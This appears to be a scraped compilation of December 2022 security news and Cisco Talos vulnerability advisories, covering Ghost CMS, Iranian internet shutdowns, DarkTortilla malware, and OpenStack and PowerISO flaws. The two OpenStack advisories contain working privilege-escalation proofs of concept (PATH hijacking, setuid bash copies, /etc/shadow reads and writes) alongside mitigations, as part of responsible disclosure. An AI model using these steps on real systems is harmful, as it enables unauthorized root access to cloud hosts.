Dave McDaniel and other members of Cisco Talos discovered these vulnerabilities.
Cisco Talos recently discovered two vulnerabilities in Ghost CMS, one authentication bypass vulnerability and one enumeration vulnerability.
Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to

Wednesday, December 21, 2022 12:12

_Dave McDaniel and other members of Cisco Talos discovered these vulnerabilities._

Cisco Talos recently discovered two vulnerabilities in Ghost CMS, one authentication bypass vulnerability and one enumeration vulnerability.

Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to members and supports a number of integrations with external services.

Talos has identified an authentication bypass vulnerability that can lead to increased privileges.  TALOS-2022-1624 (CVE-2022-41654) allows external users to update their newsletter preferences too liberally, which could allow a user full access to create and modify newsletters, including the default sent to all members.

TALOS-2022-1625 (CVE-2022-41697) is an enumeration vulnerability in the login functionality of Ghost which can lead to a disclosure of sensitive information.

An attacker can send HTTP requests to trigger these vulnerabilities.

Cisco Talos worked with Ghost to ensure that these issues were resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

Users are encouraged to update this affected product as soon as possible: Ghost Foundation Ghost 5.9.4. Talos tested and confirmed this version of Ghost could be exploited by these vulnerabilities.

The following Snort rules will detect exploitation attempts against these vulnerabilities: 60770. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Vulnerability Spotlight: Authentication bypass and enumeration vulnerabilities in Ghost CMS

A new US State Department assessment highlights the stark economic toll of Tehran’s recent shutdowns and platform control.

As internet shutdowns, platform blocking, and content filtering become increasingly common levers for authoritarian control around the world, Iran has presented an especially dramatic case study on the economic impact and humanitarian toll of connectivity blackouts. 

In response to mass government opposition and protests, the Iranian regime launched an extensive shutdown in September that drastically limited all digital communication in the country. And Tehran has ongoing campaigns to slow connectivity and access to popular services, including Meta's Instagram. Dragging out the disruptions, though, is beginning to reveal the true economic toll of the brutal technique, according to new assessments by the US Department of State.

Iran is already a heavily sanctioned and isolated nation, yet the government has repeatedly imposed broad digital restrictions and shutdowns, including notable initiatives in 2017 and 2019. The cumulative impact of these crackdowns has affected the rights of more than 80 million people living in Iran and disrupted every aspect of Iranian society, including commerce.

“This is another instance, an important one, in which the officials show how they consistently pick their own self-interest over the public interest,” says Reza Ghazinouri, a strategic adviser for the San Francisco–based human rights and civil liberties group United for Iran. “In the past years, millions of Iranians have fallen below the poverty line, and further limiting access to platforms like Instagram just adds many more to that number. And this disproportionately impacts women. Sixty-four percent of Iranian businesses on Instagram are women-owned.”

From communicating with customers to processing transactions, businesses rely on digital platforms in different ways, but digital disruptions have an impact on businesses of all sizes. Multiple Iranian trade associations have said in recent weeks that their member companies are reporting major losses. And some reports have found that the recent outage affected hundreds of thousands of small businesses. 

“This censorship underscores the degree to which Iran’s leadership fears what is possible when its people can freely communicate with one another and the outside world,” Rob Malley, US special envoy for Iran, told WIRED in written remarks.

The protest movement in Iran has gained momentum since 22-year-old Mahsa Amini died in the custody of Iran's “morality police” while being held for allegedly breaking rules about wearing hijab. Since September, more than 18,000 people have been detained by Iranian law enforcement related to the demonstrations, and nearly 500 people, including nearly 60 children, have been killed at the protests as officials exert increasingly draconian force on demonstrators. 

Analysis of the recent shutdown by a consortium of digital rights groups, published at the end of November and cited by the State Department, showed that the Iranian government has been deploying an increasingly broad set of technical capabilities to make it more difficult for the population to circumvent digital restrictions. For example, the government has broadened its ability to block encrypted connections to defeat users' efforts to conceal their web browsing. Officials have also continued to expand their blocks on the Google Play Store, Apple's App Store, and browser extension stores, making it harder for Iranians to download circumvention tools. The findings also indicate that there is a cumulative impact and increasing effectiveness over time as the government stacks censorship, content filtering, and blocking with intermittent and large-scale outages.

It is difficult to gauge the exact economic impact of the digital blackouts and disentangle it from other factors like international sanctions. Based on the escalating internet shutdown tactics and tolerance for self-inflicted damage, though, the State Department believes that the Iranian regime feels more threatened by the recent protest movement than previous public waves of opposition. 

Earlier this month, in a high-profile concession to protesters, the Iranian government said it had shut down the “morality police” that enforced restrictive laws, particularly a rigid Islamic dress code for women. The laws are still in place, though, and it is unclear how much the move will actually impact enforcement in practice.

A State Department spokesperson told WIRED in a statement that the White House is “committed to helping the Iranian people exercise their universal right to freedom of expression and to freely access information via the internet.”

Iran’s Internet Blackouts Are Sabotaging Its Own Economy

A privilege escalation vulnerability exists in the sudo functionality of OpenStack Kolla git master 05194e7618. A misconfiguration in /etc/sudoers within a container can lead to increased privileges.

**SUMMARY**

A privilege escalation vulnerability exists in the sudo functionality of OpenStack Kolla git master 05194e7618. A misconfiguration in /etc/sudoers within a container can lead to increased privileges.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

OpenStack git master 05194e7618

**PRODUCT URLS**

OpenStack - https://opendev.org/openstack/

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-269 - Improper Privilege Management

**DETAILS**

OpenStack Kolla provides container images and deployment tools for running OpenStack clouds with best practice configurations.

Several Kolla containers have a sudoers policy to allow the application to run limited commands as root, which appears to be defined here:

    Matching Defaults entries for nova on <host>:
        setenv
    
    User nova may run the following commands on <host>:
        (root) NOPASSWD: /usr/local/bin/kolla_copy_cacerts
        (root) NOPASSWD: /usr/local/bin/kolla_set_configs
        ...
    

Of note is the Defaults: %kolla setenv line in /etc/sudoers. This allows users in the kolla group to modify environment variables, and there is no secure_path option that enforces a trusted PATH environment variable. Therefore, the unprivileged user (nova in this example) can change the PATH variable used by sudo, and run arbitrary commands as root when the Kolla scripts call external programs.

Specifically, there are two Kolla-provided scripts that are exploitable via this sudoers configuration.

The first script, kolla\_copy\_cacerts, calls out to the update-ca-certificates program, which is resolved from the PATH environment variable. This can be exploited by creating a script named “update-ca-certificates” in some writable location, and adding this location to the PATH before running sudo -E kolla_copy_cacerts.

The second script, kolla\_set\_configs, reads an environment variable for a JSON object or a path to a file containing a JSON object. This JSON specifies the source, destination, ownership and permissions for OpenStack configuration files to be copied. This can be exploited by exporting an environment variable that specifies a program to be copied with its SETUID bit set, and running kolla_set_configs with sudo -E as above.

Some containers (e.g. nova\_api) with this configuration are privileged, so in that case, root access inside the container may equate to root privilege on the container host itself.

**Exploit Proof of Concept****Method 1 (kolla_copy_cacerts)**

Observe current privilege level in container:

    $ id
    uid=42436(nova) gid=42436(nova) groups=42437(nova),42400(kolla),42427(qemu)
    

Create a script payload that will be executed as root:

    $ echo -e '#!/bin/sh\nexec bash -p' > /tmp/update-ca-certificates
    $ chmod 755 /tmp/update-ca-certificates
    

Update the shell’s PATH environment variable to include the directory that the payload is in, and run the affected script with sudo:

    $ PATH=/tmp:$PATH sudo -E /usr/local/bin/kolla_copy_cacerts
    # id
    uid=0(root) gid=0(root) groups=0(root)
    

**Method 2 (kolla_set_configs)**

Observe current privilege level in container:

    $ id
    uid=42436(nova) gid=42436(nova) groups=42437(nova),42400(kolla),42427(qemu)
    

Create a JSON object to be parsed by the script and export it to the appropriate environment variable:

    $ export KOLLA_CONFIG='{"command":"echo test", "config_files":[{"source":"/bin/bash", "dest":"/tmp/bash", "owner":"root", "perm":"0o6755"}]}'
    

Run the affected script with sudo and then execute the copied shell:

    $ sudo -E /usr/local/bin/kolla_set_configs
    $ /tmp/bash -p
    # id
    uid=0(root) gid=0(root) groups=0(root)
    

**Mitigation**

/etc/sudoers within the container should use the secure_path option to prevent the PATH environment variable from being modified; however this will not prevent other possibly dangerous environment variables from being changed. Ideally, the setenv option would be removed from /etc/sudoers altogether, and env_keep could be used for any safe environment variables that do not introduce security holes.

To avoid container compromises resulting in host compromise, avoid using privileged containers; prefer adding individual capabilities as needed.

**TIMELINE**

2022-08-11 - Vendor Disclosure  
2022-08-11 - Initial Vendor Contact  
2022-12-20 - Public Release

CVE-2022-38060: TALOS-2022-1589 || Cisco Talos Intelligence Group

A privilege escalation vulnerability exists in the oslo.privsep functionality of OpenStack git master 05194e7618 and prior. Overly permissive functionality within tools leveraging this library within a container can lead increased privileges.

**SUMMARY**

A privilege escalation vulnerability exists in the oslo.privsep functionality of OpenStack git master 05194e7618 and prior. Overly permissive functionality within tools leveraging this library within a container can lead increased privileges.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

OpenStack git master 05194e7618

**PRODUCT URLS**

OpenStack - https://opendev.org/openstack/

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-269 - Improper Privilege Management

**DETAILS**

OpenStack is a cloud platform that contains a number of tools, libraries and services for providing simplified, powerful and scalable cloud-based applications.

OpenStack’s oslo.privsep library “helps applications perform actions which require more or less privileges… in a safe, easy to code and easy to use manner.” An entry in sudoers is generally added to bootstrap oslo.privsep with the correct privileges when run from an unprivileged user such as nova.

The oslo.privsep design documents state the following:

    Privileged functions must be as simple, specialized and narrow as possible, so as to prevent further escalation. In this example, 
    update_motd(message) is narrow: it only allows the service to overwrite the MOTD file. If a more generic update_file(filename, content) was created, 
    it could be used to overwrite any file in the filesystem, allowing easy escalation to root rights. That would defeat the whole purpose of oslo.privsep.
    ...
    Provided the unprivileged<->privileged boundary contains any hole that effectively grants root to the caller, then there is little benefit to having the separation [provided by privsep]
    

Two modules were observed to have functions that were overly broad and allowed for trivial escalation to root. The nova module contains privileged wrappers for chmod, chown and rmdir, as well as arbitrary file create/write/move/read. Second, the os\_brick module contains functions to execute arbitrary shell commands as root. The source file contains the following comment from 2016:

    Just in case it wasn't clear, this is a massive security back-door. [these wrappers] allow any command to be run as the privileged user (default "root"). 
    This is intended only as an expedient transition and should be removed ASAP.
    

Either of the above modules are sufficient to achieve privilege escalation to root. Other modules within OpenStack were not audited, but it is possible that similar issues exist elsewhere in the codebase.

**Crash Information****Method 1 (nova)**

    from nova.privsep.path import *
    from oslo_config.cfg import CONF
    CONF.privsep_context = 'nova.privsep.sys_admin_pctxt'
    # Read /etc/shadow
    last_bytes("/etc/shadow", 1000)
    # Write to /etc/shadow
    writefile("/etc/shadow", "wb", b"<payload_here>")
    # Get a root shell
    os.system("cp /bin/bash /tmp/bash")
    chown("/tmp/bash", 0)
    chmod("/tmp/bash", 0o4755)
    os.system("/tmp/bash -p")
    bash-5.1#
    

**Method 2 (os\_brick)**

    from os_brick.privileged.rootwrap import *
    from oslo_config.cfg import CONF
    import shlex # helpful for multi-arg commands
    CONF.privsep_context = 'os_brick.privileged.default'
    execute_root(*shlex.split("id"))
    ('uid=0(root) gid=0(root) groups=0(root)\n', '')
    

**Mitigation**

Privileged functions in the nova and os_brick modules of OpenStack should be rewritten to be as specialized and narrowly tailored as possible; e.g. chmod(path, mode) should be replaced with a function that only applies pre-defined permissions on one or more pre-defined files.

Suggest auditing other modules that use oslo.privsep to identify similar issues.

**TIMELINE**

2022-09-07 - Vendor Disclosure  
2022-12-20 - Public Release

CVE-2022-38065: TALOS-2022-1599 || Cisco Talos Intelligence Group

As more and more users adopt new versions of Microsoft Office, it is likely that threat actors will turn away from VBA-based malicious documents to other formats such as XLLs or rely on exploiting newly discovered vulnerabilities to launch malicious code.

Threat Spotlight: XLLing in Excel - threat actors using malicious add-ins

Sites spoofing Grammarly and a Cisco webpage are spreading the DarkTortilla threat, which is filled with follow-on malware attacks.

Researchers have spotted two phishing sites — one spoofing a Cisco webpage and the other masquerading as a Grammarly site — that threat actors are using to distribute a particularly pernicious piece of malware known as "DarkTortilla."

The .NET-based malware can be configured to deliver various payloads and is known for functions that make it extremely stealthy and persistent on the systems it compromises.

Multiple threat groups have been using DarkTortilla since at least 2015 to drop information stealers and remote access Trojans, such as AgentTesla, AsyncRAT and NanoCore. Some ransomware groups too — such as the operators of Babuk — have used DarkTortilla as part of their payload delivery chain. In many of these campaigns, attackers have primarily used malicious file attachments (.zip, .img, .iso) in spam emails to wrap up unsuspecting users in the malware.

**DarkTortilla Delivery Via Phishing Sites**

Recently, researchers at Cyble Research and Intelligence Labs identified a malicious campaign where threat actors are using two phishing sites, masquerading as legitimate sites, to distribute the malware. Cyble surmised that the operators of the campaign are likely using spam email or online ads to distribute links to the two sites.

Users who follow the link to the spoofed Grammarly website end up downloading a malicious file named "GnammanlyInstaller.zip" when they click on the "Get Grammarly" button. The .zip file contains a malicious installer disguised as a Grammarly executable that drops a second, encrypted 32-bit .NET executable. That in turn downloads an encrypted DLL file from an attacker-controlled remote server. The .NET executable decrypts the encrypted DLL file and loads it into the compromised system's memory, where it executes a variety of malicious activities, Cyble said.

The Cisco phishing site meanwhile looks like a download page for Cisco's Secure Client VPN technology. But when a user clicks on the button to "order" the product, they end up downloading a malicious VC++ file from a remote attacker-controlled server instead. The malware triggers a series of actions that end with DarkTortilla installed on the compromised system.

Cyble's analysis of the payload showed the malware packing functions for persistence, process injection, doing antivirus and virtual machine/sandbox checks, displaying fake messages, and communicating with its command-and-control (C2) server and downloading additional payloads from it.

Cyble's researchers found that to ensure persistence on an infected system for instance, DarkTortilla drops a copy of itself into the system's Startup folder and creates Run/Winlogin registry entries. As an additional persistence mechanism, DarkTortilla also creates a new folder named "system\_update.exe" on the infected system and copies itself into the folder.

**Sophisticated & Dangerous Malware**

DarkTortilla's fake message functionality meanwhile basically serves up messages to trick victims into believing the Grammarly or Cisco application they wanted failed to execute because certain dependent application components were not available on their system.

"The DarkTortilla malware is highly sophisticated .NET-based malware that targets users in the wild," Cyble researchers said in a Monday advisory. "The files downloaded from the phishing sites exhibit different infection techniques, indicating that the \[threat actors\] have a sophisticated platform capable of customizing and compiling the binary using various options."

DarkTortilla, as mentioned, often acts as a first-stage loader for additional malware. Researchers from Secureworks' Counter Threat Unit earlier this year identified threat actors using DarkTortilla to mass distribute a wide range of malware including, Remcos, BitRat, WarzoneRat, Snake Keylogger, LokiBot, QuasarRat, NetWire, and DCRat.

They also identified some adversaries using the malware in targeted attacks to deliver Cobalt Strike and Metasploit post-compromise attack kits. At the time, Secureworks said it had counted at least 10,000 unique DarkTortilla samples since it first spotted a threat actor using the malware in an attack targeting a critical Microsoft Exchange remote code execution vulnerability (CVE-2021-34473) last year.

Secureworks assessed DarkTortilla as being very dangerous because of its high degree of configurability and its use of open source tools like CofuserEX and DeepSea to obfuscate its code. The fact that DarkTortilla's main payload is executed entirely in memory is another feature that makes the malware dangerous and difficult to spot, Secureworks noted at the time.

Sophisticated DarkTortilla Malware Serves Imposter Cisco, Grammarly Pages

Leading global education provider engages with Bugcrowd Security Researchers to identify threats.

**SYDNEY** **and** **SAN FRANCISCO****,** **Dec. 19, 2022** **/PRNewswire/ --** Bugcrowd, the leader in crowdsourced cybersecurity, today announced that Navitas, one of the world's leading global education providers, has launched a private bug bounty program with Bugcrowd to identify and resolve security vulnerabilities.

Navitas delivers educational programs to 60,000 aspirational students each year across its network of 92 colleges and campuses in 24 countries around the world. Under the bug bounty program, dozens of Bugcrowd security researchers will test Navitas' web applications for security risks on an ongoing basis. Ethical hackers who identify and remediate any valid threats will receive a bug bounty financial reward of up to AUD $3,700 (USD $2,500), depending on the severity of the uncovered threat.

Gavin Ryan, Global Head of Information Security for Navitas, selected the Bugcrowd crowdsourced security solution based on its proven track record of being able to scale, reduce costs and risks through a continuous testing process, along with the extensive global reach of its researcher team. 

"At Navitas we take the security of our data and applications extremely seriously and are always seeking innovative ways to protect the private information of our students and staff from continuous and fast-changing cyber threats," said Gavin Ryan. "We are pleased to partner with Bugcrowd to take advantage of its extensive network of trained security researchers who can help us find and resolve online vulnerabilities before attacks occur. Only a month into the program, we are already realising the benefits of a bug bounty program and plan to extended it to include agile continuous security testing across selected non production environments" 

Bugcrowd's ability to deliver a fast return on investment through crowdsourced bug bounties, rather than undertaking lengthy and costly consulting engagements, was one of the biggest contributing factors in its selection. The solution's continuous assurance model was also better positioned to safeguard Navitas' global attack surface, which had made traditional penetration testing less tenable and less effective for ongoing application security assurance.

"Bugcrowd is excited to work with Navitas in assisting to protect both their data and applications with a comprehensive bug bounty strategy and a non production testing strategy," said Nick McKenzie, Chief Information and Security Officer at Bugcrowd. "Our extensive global crowdsourced security team has the ability to scale for Navitas's requirements, provide critical protections around the clock, and through the introduction of non-production testing regimes will help the Navitas business deliver at a higher digital velocity. We are happy that both control outcomes and the economics of the program's delivery (vs other testing regimes) have exceeded expectations."

"Bugcrowd" and the "Bugcrowd Security Knowledge Platform" are trademarks of Bugcrowd Inc. and its subsidiaries. All other trademarks, trade names, service marks and logos referenced herein belong to their respective companies.

**About Bugcrowd**

Bugcrowd is the leading provider of crowdsourced cybersecurity solutions purpose-built to secure the digitally connected world. Today's enterprise demands an offensive approach to cybersecurity—and Bugcrowd offers the only solution that orchestrates data, technology, and human intelligence to expose blind spots. The Bugcrowd Security Knowledge Platform™ enables businesses to do everything proactively possible to protect their organization, reputation and customers with products like Bug Bounty, Penetration Testing-as-a-Service, and more. Trusted by organizations across the globe, Bugcrowd uncovers and remediates vulnerabilities before they interrupt business by leveraging expert ingenuity and the knowledge of world-class security researchers. Based in San Francisco, Bugcrowd is backed by Blackbird Ventures, Costanoa Ventures, Industry Ventures, Paladin Capital Group, Rally Ventures, Salesforce Ventures and Triangle Peak Partners. Learn more at www.bugcrowd.com.

SOURCE Bugcrowd

Bugcrowd Launches Bug Bounty Program for Australian-Based Navitas

A memory corruption vulnerability exists in the VHD File Format parsing CXSPARSE record functionality of PowerISO PowerISO 8.3. A specially-crafted file can lead to an out-of-bounds write. A victim needs to open a malicious file to trigger this vulnerability.

**SUMMARY**

A memory corruption vulnerability exists in the VHD File Format parsing CXSPARSE record functionality of PowerISO PowerISO 8.3. A specially-crafted file can lead to an out-of-bounds write. A victim needs to open a malicious file to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

PowerISO PowerISO 8.3

**PRODUCT URLS**

PowerISO - https://www.poweriso.com/

**CVSSv3 SCORE**

7.8 - CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-787 - Out-of-bounds Write

**DETAILS**

PowerISO is a disk image file processing tool supporting operations on various file formats, and also allows to mount images as a virtual drive.

Virtual Hard Disk (VHD) Image format is a commonly image format used in Microsoft virtualization products. It is both used to store hard disk images and snapshots.  
For more details about this format see link.

Vulnerable code below:

        0000000000442869 | 41:8B0C38                | mov ecx,dword ptr ds:[r8+rdi]
        000000000044286D | 41:FFC1                  | inc r9d
        0000000000442870 | 8BC1                     | mov eax,ecx
        0000000000442872 | 8BD1                     | mov edx,ecx
        0000000000442874 | C1E9 08                  | shr ecx,8
        0000000000442877 | C1E2 10                  | shl edx,10
        000000000044287A | 41:23C5                  | and eax,r13d
        000000000044287D | 41:23CD                  | and ecx,r13d
        0000000000442880 | 0BD0                     | or edx,eax
        0000000000442882 | 41:0FB64438 03           | movzx eax,byte ptr ds:[r8+rdi+3]
        0000000000442888 | C1E2 08                  | shl edx,8
        000000000044288B | 0BD0                     | or edx,eax
        000000000044288D | 48:8B43 10               | mov rax,qword ptr ds:[rbx+10]
        0000000000442891 | 0BD1                     | or edx,ecx
        0000000000442893 | 41:891400                | mov dword ptr ds:[r8+rax],edx
        0000000000442897 | 49:83C0 04               | add r8,4
        000000000044289B | 44:3B4B 18               | cmp r9d,dword ptr ds:[rbx+18]       ; * Num of blocks from cxsparse record
        000000000044289F | 72 C8                    | jb poweriso.442869
    

Vulnerability exists because the “Num of blocks” value from the CXSPARSE record is not validated properly.  
An attacker can control the loop counter leading to arbitrary memory write.

**Crash Information**

    	PowerISO+0x42893:
    	00000000`00442893 41891400        mov     dword ptr [r8+rax],edx ds:00000000`02b2f000=????????
    
    
    	0:000> !analyze -v
    	*******************************************************************************
    	*                                                                             *
    	*                        Exception Analysis                                   *
    	*                                                                             *
    	*******************************************************************************
    
    
    	KEY_VALUES_STRING: 1
    
    		Key  : AV.Fault
    		Value: Write
    
    		Key  : Analysis.CPU.mSec
    		Value: 1281
    
    		Key  : Analysis.DebugAnalysisManager
    		Value: Create
    
    		Key  : Analysis.Elapsed.mSec
    		Value: 17362
    
    		Key  : Analysis.IO.Other.Mb
    		Value: 9
    
    		Key  : Analysis.IO.Read.Mb
    		Value: 1
    
    		Key  : Analysis.IO.Write.Mb
    		Value: 12
    
    		Key  : Analysis.Init.CPU.mSec
    		Value: 406
    
    		Key  : Analysis.Init.Elapsed.mSec
    		Value: 9616
    
    		Key  : Analysis.Memory.CommitPeak.Mb
    		Value: 106
    
    		Key  : Timeline.OS.Boot.DeltaSec
    		Value: 471002
    
    		Key  : Timeline.Process.Start.DeltaSec
    		Value: 12
    
    		Key  : WER.OS.Branch
    		Value: vb_release
    
    		Key  : WER.OS.Timestamp
    		Value: 2019-12-06T14:06:00Z
    
    		Key  : WER.OS.Version
    		Value: 10.0.19041.1
    
    		Key  : WER.Process.Version
    		Value: 8.3.0.0
    
    
    	NTGLOBALFLAG:  0
    
    	PROCESS_BAM_CURRENT_THROTTLED: 0
    
    	PROCESS_BAM_PREVIOUS_THROTTLED: 0
    
    	APPLICATION_VERIFIER_FLAGS:  0
    
    	EXCEPTION_RECORD:  (.exr -1)
    	ExceptionAddress: 0000000000442893 (PowerISO+0x0000000000042893)
    	   ExceptionCode: c0000005 (Access violation)
    	  ExceptionFlags: 00000000
    	NumberParameters: 2
    	   Parameter[0]: 0000000000000001
    	   Parameter[1]: 0000000002c5f000
    	Attempt to write to address 0000000002c5f000
    
    	FAULTING_THREAD:  00000ba0
    
    	PROCESS_NAME:  PowerISO.exe
    
    	WRITE_ADDRESS:  0000000002c5f000 
    
    	ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
    
    	EXCEPTION_CODE_STR:  c0000005
    
    	EXCEPTION_PARAMETER1:  0000000000000001
    
    	EXCEPTION_PARAMETER2:  0000000002c5f000
    
    	STACK_TEXT:  
    	00000000`0014de30 00000000`00442aad     : 00000000`00000200 00000000`00000000 00000000`000007b3 00000000`3000cbfb : PowerISO+0x42893
    	00000000`0014e2b0 00000000`00442d2c     : 00000000`05a603c0 00000000`00000000 78697463`656e6f63 00000000`00000001 : PowerISO+0x42aad
    	00000000`0014e520 00000000`004061ae     : 00000000`00000001 00000000`00000688 00000000`03380f70 00000000`03380f70 : PowerISO+0x42d2c
    	00000000`0014e560 00000000`005d6cf6     : 00000000`0014e7a8 00000000`0014e7a8 00000000`00000001 00000000`02ba853c : PowerISO+0x61ae
    	00000000`0014e710 00000000`004f2733     : 00000000`0014e8b0 00000000`00000000 00000000`00000000 00007ff9`4a6dc9bb : PowerISO+0x1d6cf6
    	00000000`0014e830 00000000`004f2fc5     : 00000000`1c12beb3 00000000`0014ebc8 00000000`66076fb2 00000000`d88dfeb5 : PowerISO+0xf2733
    	00000000`0014eb90 00000000`005561ef     : 00000000`00000004 00000000`0333ba1c 00000000`00000000 00000000`03348f60 : PowerISO+0xf2fc5
    	00000000`0014ebc0 00000000`004ee5ad     : 00000000`0014ed00 00007ff9`35ff414e 00000000`00000004 00008731`00000002 : PowerISO+0x1561ef
    	00000000`0014ebf0 00000000`006280ed     : 00000000`00000001 00007ff9`4a6deb96 00000000`00000363 00000000`00000001 : PowerISO+0xee5ad
    	00000000`0014f890 00000000`00624c83     : 00000000`02b50150 ffffffff`ffffffff 00000000`00000006 00000000`00000080 : PowerISO+0x2280ed
    	00000000`0014f9c0 00000000`004ebf6f     : 00000000`00000000 00000000`00d3103e 00000000`03348f60 00000000`00000001 : PowerISO+0x224c83
    	00000000`0014fa20 00000000`00626410     : ffffffff`fffffffe 00000000`00000113 00000000`00000000 00000000`00000113 : PowerISO+0xebf6f
    	00000000`0014fa50 00000000`006265be     : 00000000`008df500 00000000`00becb30 00000000`0333c920 00007ff9`02000002 : PowerISO+0x226410
    	00000000`0014fb10 00007ff9`4a6de858     : 00000000`008df4a0 00000000`00000113 00000000`00000001 00000000`00000000 : PowerISO+0x2265be
    	00000000`0014fb70 00007ff9`4a6de299     : 00000000`00d3103e 00000000`00626570 00000000`00d3103e 00000000`00000113 : USER32!UserCallWinProcCheckWow+0x2f8
    	00000000`0014fd00 00000000`00621c6d     : 00000000`00626570 00000000`008df4a0 00000000`00000002 00000000`008df4a0 : USER32!DispatchMessageWorker+0x249
    	00000000`0014fd80 00000000`00621aa9     : 00000000`008df4a0 00000000`00400000 00000000`00000001 00000000`00000000 : PowerISO+0x221c6d
    	00000000`0014fdc0 00000000`0062aa57     : 00000000`006486d8 00000000`00000000 00000000`00648718 00000000`00648720 : PowerISO+0x221aa9
    	00000000`0014fe20 00000000`005f607b     : 00000000`00000045 00000000`00000000 00000000`00000000 00000000`00400000 : PowerISO+0x22aa57
    	00000000`0014fe80 00007ff9`4a627034     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : PowerISO+0x1f607b
    	00000000`0014ff30 00007ff9`4a9426a1     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
    	00000000`0014ff60 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
    
    
    	STACK_COMMAND:  ~0s ; .cxr ; kb
    
    	SYMBOL_NAME:  PowerISO+42893
    
    	MODULE_NAME: PowerISO
    
    	IMAGE_NAME:  PowerISO.exe
    
    	FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_PowerISO.exe!Unknown
    
    	OS_VERSION:  10.0.19041.1
    
    	BUILDLAB_STR:  vb_release
    
    	OSPLATFORM_TYPE:  x64
    
    	OSNAME:  Windows 10
    
    	IMAGE_VERSION:  8.3.0.0
    
    	FAILURE_ID_HASH:  {1b12d601-7fad-79d8-d5a8-9f7caedc20c8}
    
    	Followup:     MachineOwner
    	---------
    

**TIMELINE**

2022-10-27 - Vendor Disclosure  
2022-11-28 - Vendor Patch Release  
2022-12-07 - Public Release

Discovered by Piotr Bania of Cisco Talos.

CVE-2022-41992: TALOS-2022-1644 || Cisco Talos Intelligence Group

In this episode of Talos Takes we are joined by Kendall McKay to discuss the recently released year in review report and dig deep on our activities in Ukraine. The year in review covers a vast amount of data and intel sources to identify some of the key trends we observed in 2022.

Friday, December 16, 2022 09:12

In this episode of Talos Takes we are joined by Kendall McKay to discuss the recently released year in review report and dig deep on our activities in Ukraine. The year in review covers a vast amount of data and intel sources to identify some of the key trends we observed in 2022. Our activities in Ukraine have been well documented, in this episode we'll also talk more broadly about the trends and highlight some key findings from the past year.

This and all other episdoes are available on the Talos Takes podcast page and most major podcasting outlets.

Visit the Year in Review page for the full report, with topic summary reports, livestreams, podcasts, and other content starting December 14th.  New content will be added with each topic summary release through February.  You can access the full 2022 Cisco Talos Year in Review report directly here:

Talos Takes Ep. 122: Year in Review & Ukraine Activities

The inaugural 2022 Talos Year in Review is here! And it’s taking over the final Threat Source newsletter of the year.

Thursday, December 15, 2022 14:12

Welcome to this week’s edition of the Threat Source newsletter.

It’s the most wonderful time of the year, and I’m not talking about the holidays. The inaugural 2022 Talos Year in Review is here! And it’s taking over the final Threat Source newsletter of the year. Oh and did we mention we’re on Mastodon now? Talos, the gift that keeps on giving.

**The one big thing**

The 2022 Talos Year in Review is officially launched and with it a compressive story of our work in the past year relying on a wide variety of data and expertise. We expect this data-driven story will shed some insight into Cisco’s and the security community’s most notable successes and remaining challenges. In addition, as these Year in Review reports continue in the future, we aim to provide data and narratives that help explain how the threat landscape changes from one year to the next. We hope you find this report as elucidating to read as it was to research and write, and that it arms the security community with the information and context needed to continue fighting the good fight.

**Why do I care?**

Talos’ Year in Review takes a broad look not only at the major security events but looks at the major impacts and trends within the larger threat landscapes and takes a deep dive in to the top threats. We’ll be hosting livestreams on four sub-sections of the report with researchers and report contributors to cover the full research and findings.

**So now what?**

Pour yourself a glass of your favorite beverage, start up the fire and get to reading! Mark your calendar for our next three livestreams in the new year:

2022 Year in Review-APTs: Jan 10th, 12pm ET

2022 Year in Review- Threat Landscape: Jan 24th, 12pm ET

2022 Year in Review- Ransomware & Commodity Loaders: February 7th, 12pm ET

**Top security headlines of the week**

If you’ve yet to stumble upon ChatGPT or hear about it at the office water cooler you may be living under a rock (we’ve been there too). The AI chat bot developed by OpenAI and released last week, creates human like responses to user-generated prompts. While it has the ability to take on mundane tasks the evolution of AI still raises eyebrows in security communities with concerns of deep fakes and fake news campaigns. (CNET)

The U.S. Department of Justice announced this week the take down of leading global distributed denial-of-service sites for-hire websites. The takedowns were part of a joint operation, “Operation PowerOFF”, between the US, the U.K.’s National Crime Agency, Dutch police, and Europol. The sites were involved in attacks against varied victims in the U.S. and abroad, spanning educational institutions, government agencies, and gaming platforms. (TechCrunch)

The US Cybersecurity and Infrastructure Security Agency (CISA) added new flaws to its Known Exploited Vulnerabilities Catalog including Veeam, Fortinet, Microsoft and Citrix products. Vulnerabilities, CVE-2022-26500 and CVE-2022-26501, are rated ‘critical’ and impact Veeam’s Backup & Replication enterprise backup solutions. Used by 70% of Fortune 2000 companies, Veeam products continue to be tempting targets for malicious actors. (SecurityWeek)

**Can’t get enough Talos?**

·Talos 2022 Year in Review

·Beers with Talos

·Microsoft Patch Tuesday for December 2022

**Upcoming events where you can find Talos**

CactusCon (Jan 27-28)

Mesa, AZ

Cisco Live Amsterdam (Feb 6-10)

Amsterdam, Netherlands

**Most prevalent malware files from Talos telemetry over the past week**

SHA 256: 1077bff9128cc44f98379e81bd1641e5fbaa81fc9f095b89c10e4d1d2c89274d

MD5: 26f927fb7560c11e509f0b8a7e787f79  
26f927fb7560c11e509f0b8a7e787f79

